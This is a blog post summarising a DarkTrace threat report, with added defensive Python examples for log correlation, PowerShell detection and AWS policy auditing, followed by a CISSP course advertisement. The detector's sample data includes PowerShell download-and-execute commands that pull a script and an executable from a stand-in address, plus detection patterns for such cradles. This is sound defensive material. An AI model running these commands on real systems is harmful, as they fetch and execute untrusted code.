In the ever-evolving cybersecurity landscape, staying informed about the latest threats is not just a best practice—it’s a necessity. DarkTrace’s latest Annual Threat Report provides crucial insights into cybersecurity threats facing organizations worldwide. With more than 30.4 million phishing emails detected last year alone and an alarming trend of cybercriminals exploiting trusted third-party enterprise services, this report serves as both a warning and a guide for cybersecurity professionals and business leaders alike.
The Rising Tide of Phishing Attacks
The sheer volume of phishing attempts documented in DarkTrace’s report is staggering. With over 30.4 million phishing emails identified in the past year, these attacks continue to serve as the primary entry point for cybercriminals. But what makes today’s phishing attacks different from those of previous years is their increasing sophistication and ability to bypass traditional security measures.
Modern phishing attempts no longer rely solely on obvious grammatical errors or suspicious sender addresses. Instead, they leverage advanced social engineering techniques and mimic legitimate business communications with frightening accuracy. The report highlights that these attacks are becoming increasingly targeted, with cybercriminals researching their victims before crafting personalized emails that are more likely to succeed.
These aren’t random, scatter-shot attempts. They are calculated, researched, and executed with precision. Cybercriminals are investing time and resources to understand your organization’s communication patterns, hierarchies, and business operations to craft highly convincing phishing attempts that even tech-savvy employees might fall for.
Exploitation of Trusted Enterprise Services
Perhaps the most concerning finding in the DarkTrace report is the systematic exploitation of trusted third-party enterprise services. Platforms that form the backbone of modern remote and collaborative work environments—Zoom Docs, HelloSign, Adobe, Microsoft SharePoint, and others—have all been weaponized by attackers.
The Trust Paradox
These services are trusted implicitly by users and security controls alike. When you receive a SharePoint link from a colleague or a Zoom document invitation, your instinct is to trust it. Similarly, many email gateways and web proxies allowlist these domains, exempting them from link rewriting, sandboxing and content inspection, which gives attackers a delivery channel that is rarely blocked.
The report documents numerous cases where cybercriminals have compromised accounts on these platforms or created misleading content that appears to come from them. For instance, fake document-sharing notifications that lead to credential harvesting sites or malicious file downloads have become increasingly common.
Microsoft SharePoint: A Primary Target
Microsoft SharePoint, given its widespread adoption in enterprise environments, has become a particularly favored target. The report details how attackers create convincing SharePoint phishing pages that request Office 365 credentials. Once obtained, these credentials provide access to email accounts, which can then be used for internal phishing campaigns, data exfiltration, or further network penetration.
These attacks are especially dangerous because the lure arrives through trusted infrastructure. A notification sent by Microsoft's own sharing service, or a link that resolves to a tenant's sharepoint.com address, carries legitimate Microsoft branding and is far less likely to trigger suspicion than a message from an unknown sender, even when the shared document itself leads to an attacker-controlled credential harvesting page.
Malicious Payload Delivery Through Legitimate Services
Another significant trend identified in the report is the use of legitimate cloud services for malicious payload delivery. File-sharing platforms such as Google Drive and Dropbox are used to host the malware, while bulk-sending services such as Amazon Simple Email Service (SES) are used to deliver the lure messages that point to it.
Why Legitimate Services?
The reason for this approach is simple yet effective: these services are rarely blocked by corporate firewalls or email security gateways, and a download from Google Drive raises fewer flags than one from an unknown domain. Reputation-based controls score the hosting domain rather than the file it serves, so the payload inherits the provider's good reputation.
Furthermore, these services are reached over HTTPS. Unless the organization performs TLS interception, security tools see only the destination domain, not the content being downloaded, and because many organizations exempt major SaaS providers from interception for privacy or application-compatibility reasons, malware hosted there often passes through uninspected.
Multi-Stage Attack Chains
The report emphasizes that modern attacks rarely rely on a single method. Instead, they employ multi-stage attack chains that might begin with a phishing email, lead to a legitimate service hosting malware, and end with the execution of that malware on a victim’s system.
For example, a typical attack might follow this pattern:
- A phishing email contains a link to a Google Drive document
- The document contains macros or embedded links to additional content
- This secondary content triggers the download of malware from another legitimate service
- The malware establishes a connection to command and control servers
Each step in this chain leverages different legitimate services, making detection and prevention challenging for traditional security approaches.
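The chain above can be reconstructed from ordinary web-proxy logs by correlating events per host. The following is an added example, not code from the report or from DarkTrace: it reads constructed proxy log lines (the format, host names, domains and paths are all invented for illustration) and reports a host only when all three stages appear in order within a time window. The trusted-domain list and payload extensions are assumptions a real deployment would tune.

```python
"""Reconstruct multi-stage download chains from constructed web-proxy logs.

Added example (not from the report): flags a host whose traffic shows the
lure -> payload download -> never-seen domain pattern described above.
Log format, host names and domains are all constructed for illustration.
"""
from collections import defaultdict
from dataclasses import dataclass

# Sharing/collaboration domains that proxies rarely block (illustrative, not exhaustive).
TRUSTED_SHARE_DOMAINS = {
    "drive.google.com", "docs.google.com", "dropbox.com",
    "dl.dropboxusercontent.com", "sharepoint.com",
}
# File types that commonly carry a first-stage payload.
PAYLOAD_EXT = (".exe", ".dll", ".js", ".vbs", ".hta", ".iso", ".lnk", ".zip")

# Constructed sample: "<epoch> <host> <domain> <path> <referer>" per line.
SAMPLE_LOGS = """\
1700000000 ws-17 mail.example.com /owa/ -
1700000030 ws-17 drive.google.com /file/d/abc123/view mail.example.com
1700000095 ws-17 dl.dropboxusercontent.com /s/xyz/Invoice_2024.js drive.google.com
1700000110 ws-17 cdn.update-svc.net /gate.php -
1700000000 ws-22 drive.google.com /document/d/q9/edit mail.example.com
1700000200 ws-22 www.example.org /index.html -
""".strip().splitlines()


@dataclass
class Event:
    ts: int
    host: str
    domain: str
    path: str
    referer: str


def parse_line(line):
    ts, host, domain, path, referer = line.split()
    return Event(int(ts), host, domain, path, referer)


def is_trusted(domain):
    return any(domain == d or domain.endswith("." + d) for d in TRUSTED_SHARE_DOMAINS)


def reconstruct_chains(lines, window=900):
    """Return {host: [(stage, domain), ...]} for hosts showing the full chain.

    Stage 1 (lure): a request to a trusted sharing domain.
    Stage 2 (payload): within `window` seconds, a download with a payload extension
                       (possibly from another trusted service).
    Stage 3 (c2): after the payload, a request to a domain this host had never
                  contacted before and that is not a trusted service.
    """
    by_host = defaultdict(list)
    for line in lines:
        ev = parse_line(line)
        by_host[ev.host].append(ev)

    chains = {}
    for host, events in by_host.items():
        events.sort(key=lambda e: e.ts)
        seen = set()  # domains contacted so far by this host
        lure = payload = None
        stages = []
        for ev in events:
            if lure is None:
                if is_trusted(ev.domain):
                    lure, stages = ev, [("lure", ev.domain)]
            elif payload is None:
                if ev.ts - lure.ts > window:
                    # Lure went stale; this event may itself start a new chain.
                    lure, stages = (ev, [("lure", ev.domain)]) if is_trusted(ev.domain) else (None, [])
                elif ev.path.lower().endswith(PAYLOAD_EXT):
                    payload = ev
                    stages.append(("payload", ev.domain))
            elif ev.domain not in seen and not is_trusted(ev.domain):
                stages.append(("c2", ev.domain))
                chains[host] = stages
                break
            seen.add(ev.domain)
        # Hosts that never reach stage 3 produce no entry.
    return chains


if __name__ == "__main__":
    for host, stages in reconstruct_chains(SAMPLE_LOGS).items():
        print(host, " -> ".join(f"{s}:{d}" for s, d in stages))
```

In the sample, ws-17 opens a Drive link, pulls a .js file from Dropbox and then beacons to a domain it has never contacted, so it is reported; ws-22 only opens a shared document and is not. The "never seen" heuristic is deliberately per host: a domain that is new to one workstation but routine for the rest of the estate is exactly the kind of weak signal a per-host baseline surfaces and a global blocklist misses.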
The Rise of Fileless Malware
DarkTrace’s report also highlights the growing prevalence of fileless malware. Unlike traditional malware that writes an executable to disk, fileless malware runs largely in memory and persists, if at all, through registry keys, scheduled tasks or WMI event subscriptions rather than dropped files, which leaves little for file-based antivirus to scan.
Living Off the Land
These attacks often use legitimate system tools and processes to accomplish their goals—a technique known as “living off the land.” By using PowerShell, Windows Management Instrumentation (WMI), and other native Windows tools, attackers can execute malicious commands without installing any software that might trigger security alerts.
The report notes that these attacks have increased by a significant percentage over the previous year, indicating that cybercriminals are adapting their techniques to evade modern security solutions.
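Because living-off-the-land activity uses binaries that are expected on every host, detection has to look at how they are invoked rather than what runs. The following is an added example, not code from the report: it takes process-creation command lines (Sysmon event 1 or Windows 4688 style), decodes any PowerShell -EncodedCommand payload, and scores the raw and decoded text against a small indicator set. The command lines are constructed, the indicator list and threshold are assumptions, and 203.0.113.5 is a documentation address, not a real server.

```python
"""Score process-creation command lines for living-off-the-land indicators.

Added example (not from the report): decodes PowerShell -EncodedCommand
payloads and matches a small indicator set against the command line and the
decoded script. The sample command lines below are constructed; the IP
203.0.113.5 is a documentation address, not a real C2 server.
"""
import base64
import re

# (name, pattern) pairs, matched case-insensitively against the decoded script
# joined with the command line (minus the base64 blob), so indicators that an
# attacker hid behind -EncodedCommand still count.
INDICATORS = [
    ("invoke-expression", r"\biex\b|invoke-expression"),
    ("download-cradle", r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|start-bitstransfer"),
    ("hidden-window", r"-w(?:indowstyle)?\s+hidden"),
    ("policy-bypass", r"-e(?:p|xecutionpolicy)\s+bypass"),
    ("webclient", r"net\.webclient"),
    ("reflective-load", r"reflection\.assembly|frombase64string"),
]
ENC_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
SUSPICIOUS_THRESHOLD = 2  # assumed cut-off; tune against your own baseline


def decode_encoded_command(cmdline):
    """Return the UTF-16LE script hidden behind -EncodedCommand, or None."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(cmdline):
    """Return indicators, a score and a verdict for one command line."""
    encoded = ENC_RE.search(cmdline) is not None
    decoded = decode_encoded_command(cmdline)
    stripped = ENC_RE.sub("-enc <blob>", cmdline)  # keep base64 out of the regex search
    haystack = f"{decoded or ''} {stripped}"
    hits = [name for name, pat in INDICATORS if re.search(pat, haystack, re.I)]
    if encoded:
        hits.append("encoded-command")
    return {
        "decoded": decoded,
        "indicators": hits,
        "score": len(hits),
        "verdict": "suspicious" if len(hits) >= SUSPICIOUS_THRESHOLD else "benign",
    }


def _encode(ps):
    """Build an -EncodedCommand blob the way PowerShell expects it (UTF-16LE, base64)."""
    return base64.b64encode(ps.encode("utf-16-le")).decode()


# Constructed sample events: one routine admin command, one encoded download
# cradle, one WMI-spawned PowerShell download.
SAMPLE_CMDLINES = [
    "powershell.exe -Command Get-Service -Name Spooler",
    "powershell.exe -nop -w hidden -enc "
    + _encode("IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/a.ps1')"),
    'wmic.exe process call create "powershell -w hidden -c Invoke-WebRequest '
    "http://203.0.113.5/b.exe -OutFile C:\\Users\\Public\\b.exe\"",
]


if __name__ == "__main__":
    for line in SAMPLE_CMDLINES:
        r = analyze(line)
        print(r["verdict"], r["score"], r["indicators"])
```

The decoding step is the point: a string match on the raw command line sees only "-enc" and a base64 blob, while the decoded script exposes the IEX download cradle. In production this logic belongs on PowerShell script block logging (event 4104) and Sysmon data rather than on command lines alone, since attackers can also pass scripts via stdin or a file to keep the command line clean.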
Ransomware Evolution: From Encryption to Extortion
While ransomware remains a significant threat, the report documents an evolution in ransomware tactics. Rather than simply encrypting data and demanding payment for its release, modern ransomware attacks frequently involve data exfiltration as well.
Double Extortion Tactics
This “double extortion” approach gives attackers two leverage points: they can demand payment for decryption keys and threaten to publish stolen data if their demands aren’t met. Even organizations with robust backup solutions find themselves vulnerable to this approach, as backups protect against data loss but not data exposure.
The report indicates that ransom demands have continued to increase, with some attackers demanding tens of millions of dollars from larger enterprises. Additionally, ransomware operators have become more professional, offering “customer service” to assist victims with payment and decryption.
Supply Chain Vulnerabilities Exposed
The report dedicates significant attention to supply chain attacks, which became particularly prominent following incidents like the SolarWinds compromise. These attacks target trusted vendors and software providers, using them as a vector to reach their actual targets.
The Multiplier Effect
What makes supply chain attacks particularly dangerous is their multiplier effect. A single compromise can potentially affect thousands or even millions of downstream customers. The report notes that attackers are increasingly focusing on small to medium-sized vendors that might have less robust security but still maintain connections to valuable targets.
For your organization, this means that your security is only as strong as the weakest link in your supply chain. The report emphasizes the need for comprehensive vendor security assessments and continuous monitoring of third-party access to your systems.
Cloud Configuration Errors: A Growing Concern
As more organizations migrate to cloud environments, misconfigurations have become a major vulnerability. The DarkTrace report highlights numerous incidents where improperly secured cloud resources led to data breaches.
Common Misconfigurations
Some of the most common cloud security errors identified in the report include:
- Publicly accessible storage buckets
- Overly permissive Identity and Access Management (IAM) roles
- Inadequate encryption of sensitive data
- Lack of multi-factor authentication for critical resources
- Insufficient logging and monitoring
These misconfigurations often result from a lack of cloud security expertise or the rapid pace of cloud adoption that outstrips security teams’ ability to properly secure new resources.
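Two of the errors in the list above, over-permissive IAM roles and publicly accessible buckets, are visible in the policy document itself and can be caught before deployment. The following is an added example, not from the report: a small checker for AWS policy JSON that flags wildcard actions, unconditioned wildcard resources and anonymous principals, run against a weak policy and its least-privilege rewrite. The policies, bucket name and account ID are constructed for illustration.

```python
"""Audit AWS policy documents for the misconfigurations listed above.

Added example (not from the report): a small checker for over-permissive
identity policies and publicly readable bucket policies. The policy
documents, bucket name and account ID below are constructed for illustration.
"""


def _as_list(value):
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def _principal_is_public(principal):
    """True for the anonymous principal '*' or {'AWS': '*'}."""
    if principal == "*":
        return True
    return isinstance(principal, dict) and "*" in _as_list(principal.get("AWS"))


def audit_policy(policy, kind):
    """Return a list of findings. kind is 'identity' (IAM role/user policy)
    or 'resource' (S3 bucket policy, which carries a Principal)."""
    findings = []
    for i, st in enumerate(_as_list(policy.get("Statement"))):
        if st.get("Effect") != "Allow":
            continue  # Deny statements only narrow access
        actions = [a.lower() for a in _as_list(st.get("Action"))]
        resources = _as_list(st.get("Resource"))
        conditioned = bool(st.get("Condition"))
        if "*" in actions:
            findings.append(f"statement {i}: Action '*' grants every API call")
        else:
            wild = [a for a in actions if a.endswith(":*")]
            if wild:
                findings.append(f"statement {i}: service-wide wildcard action {wild}")
        if "*" in resources and not conditioned:
            findings.append(f"statement {i}: Resource '*' with no Condition")
        if kind == "resource" and _principal_is_public(st.get("Principal")) and not conditioned:
            findings.append(f"statement {i}: anonymous Principal '*' with no Condition")
    return findings


# Weak role policy: full S3 control over every bucket in the account.
WEAK_ROLE_POLICY = {
    "Version": "2012-10-17",
    "Statement": [{"Effect": "Allow", "Action": "s3:*", "Resource": "*"}],
}
# Least-privilege rewrite: two actions, one bucket prefix.
FIXED_ROLE_POLICY = {
    "Version": "2012-10-17",
    "Statement": [{
        "Effect": "Allow",
        "Action": ["s3:GetObject", "s3:PutObject"],
        "Resource": "arn:aws:s3:::app-uploads-example/*",
    }],
}
# Weak bucket policy: anyone on the internet can read every object.
WEAK_BUCKET_POLICY = {
    "Version": "2012-10-17",
    "Statement": [{
        "Sid": "PublicRead",
        "Effect": "Allow",
        "Principal": "*",
        "Action": "s3:GetObject",
        "Resource": "arn:aws:s3:::app-uploads-example/*",
    }],
}
# Fixed bucket policy: only a named role in the (constructed) account may read.
FIXED_BUCKET_POLICY = {
    "Version": "2012-10-17",
    "Statement": [{
        "Sid": "AppReaderOnly",
        "Effect": "Allow",
        "Principal": {"AWS": "arn:aws:iam::123456789012:role/app-reader"},
        "Action": "s3:GetObject",
        "Resource": "arn:aws:s3:::app-uploads-example/*",
    }],
}


if __name__ == "__main__":
    for name, doc, kind in [
        ("weak role", WEAK_ROLE_POLICY, "identity"),
        ("fixed role", FIXED_ROLE_POLICY, "identity"),
        ("weak bucket", WEAK_BUCKET_POLICY, "resource"),
        ("fixed bucket", FIXED_BUCKET_POLICY, "resource"),
    ]:
        print(name, audit_policy(doc, kind) or ["no findings"])
```

A check like this belongs in the pipeline that applies the policy, so the wildcard never reaches the account; it complements rather than replaces account-level guardrails such as S3 Block Public Access, which stop a public bucket policy from taking effect even if a reviewer misses it.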
The Human Element: Social Engineering Tactics
Despite advances in technical security measures, the human element remains a critical vulnerability. The DarkTrace report provides an extensive analysis of social engineering tactics that bypass technological defenses by manipulating human psychology.
Exploiting Current Events
The report notes that attackers quickly adapt their social engineering approaches to exploit current events and trends. During the pandemic, COVID-19-themed phishing was prevalent. More recently, geopolitical events, economic concerns, and even popular culture have been leveraged to create convincing pretexts for phishing attempts.
One needs to understand that social engineering attacks succeed because they trigger emotional responses—curiosity, fear, urgency—that override rational thinking and security awareness. The report emphasizes that even well-trained employees can fall victim to sufficiently sophisticated social engineering attacks.
Artificial Intelligence: Both Threat and Defense
An emerging trend covered in the DarkTrace report is the dual role of artificial intelligence in cybersecurity—as both a threat and a defense mechanism.
AI-Powered Attacks
The report documents the increasing use of AI by attackers to:
- Generate convincing phishing emails that mimic human writing styles
- Identify vulnerable systems more efficiently
- Automate the customization of attacks based on gathered intelligence
- Evade detection by learning security system patterns
These AI-powered attacks can scale more effectively and adapt more quickly than traditional methods, presenting a significant challenge to security teams.
AI-Driven Defense
On the defensive side, the report highlights how organizations are leveraging AI, including DarkTrace’s own solutions, to:
- Detect anomalous behavior that indicates potential breaches
- Respond automatically to contain threats before they spread
- Predict potential attack vectors based on organizational vulnerabilities
- Continuously learn and adapt to new threat patterns
The report suggests that AI-driven security will become essential as the volume, velocity, and sophistication of attacks continue to increase beyond what human analysts can effectively monitor.
Recommendations and Best Practices
Based on the findings in the report, several key recommendations emerge for organizations looking to strengthen their security posture:
Implement Zero Trust Architecture
The traditional perimeter-based security model is no longer sufficient. The report strongly advocates for a zero-trust approach where nothing—internal or external—is trusted by default, and verification is required for all access attempts.
Focus on Detection and Response
Given that prevention will inevitably fail against sufficiently determined attackers, the report emphasizes the importance of robust detection and response capabilities. Reducing “dwell time”—the period between initial compromise and detection—is critical to limiting damage.
Address the Human Element
Technical solutions alone are insufficient. The report recommends comprehensive security awareness training that goes beyond annual compliance exercises to create a security-conscious culture throughout the organization.
Secure The Supply Chain
Implement rigorous vendor security assessments and continuous monitoring of third-party access to your systems and data.
Adopt Integrated Security Tools
Rather than relying on a patchwork of point solutions, the report suggests that organizations benefit from integrated security platforms that can correlate data from multiple sources to identify complex attack patterns.
The DarkTrace Annual Threat Report paints a picture of an increasingly complex threat landscape where attackers are constantly innovating and adapting. Traditional security approaches are proving inadequate against these evolving threats, necessitating a more dynamic and comprehensive approach to cybersecurity.
For your organization, the key takeaway should be that security is no longer a static goal to be achieved but an ongoing process of adaptation and improvement. By understanding the threat landscape detailed in this report and implementing the recommended security measures, you can significantly reduce your risk exposure in this challenging environment.
Remember that cybersecurity is not solely an IT responsibility but a business imperative that requires commitment from all levels of the organization. The threats outlined in the DarkTrace report affect every aspect of modern business operations, making cybersecurity a fundamental component of business strategy rather than simply a technical consideration.
By staying informed about the latest threats and continuously evolving your security posture, you can protect your organization’s assets, reputation, and operations in an increasingly hostile digital environment.

Get CISSP certification with Cognixia
Once you have employees with the CISSP certification, they can demonstrate their skills to benefit your business with:
- A complete understanding of how to protect confidential business data from attackers.
- The ability to analyze risks, recognize the common attacker strategies that can affect your business, identify the organization's weak points and work on them.
- The skills to improve both customer and employee privacy, ensuring that information stays within the business.
Get (ISC)2 CISSP Training & Certification and increase your business visibility as well as credibility in the cybersecurity market. Cognixia is the world’s leading digital talent transformation company that offers a wide range of courses, including CISSP training online with a comprehensive CISSP study guide.
Here’s what you will learn in this course –
- Learn and apply the concepts of security & risk management
- Gain an understanding of security engineering to protect information by exploring and examining security models and frameworks
- Learn how to identify, categorize, & prioritize assets
- Examine secure network architecture and its components
- Learn how to identify & control access to protect assets
- Designing and conducting security assessment strategies, logging, & monitoring activities
- Developing a recovery strategy and maintaining operational resilience
- Learn how to secure the software development cycle
Prerequisites
- Candidates for the CISSP certification should have at least 5 years of total paid work experience in two or more of the 8 CISSP CBK domains. Any extra certificate from the (ISC)2 authorized list, a four-year college degree, or a regional equivalent would qualify as one year of the necessary experience.
- If a candidate doesn’t have enough experience to qualify as a CISSP, they can still become an Associate of (ISC)2 by passing the CISSP exam. After that, they will have 6 years to acquire the 5 years of necessary experience.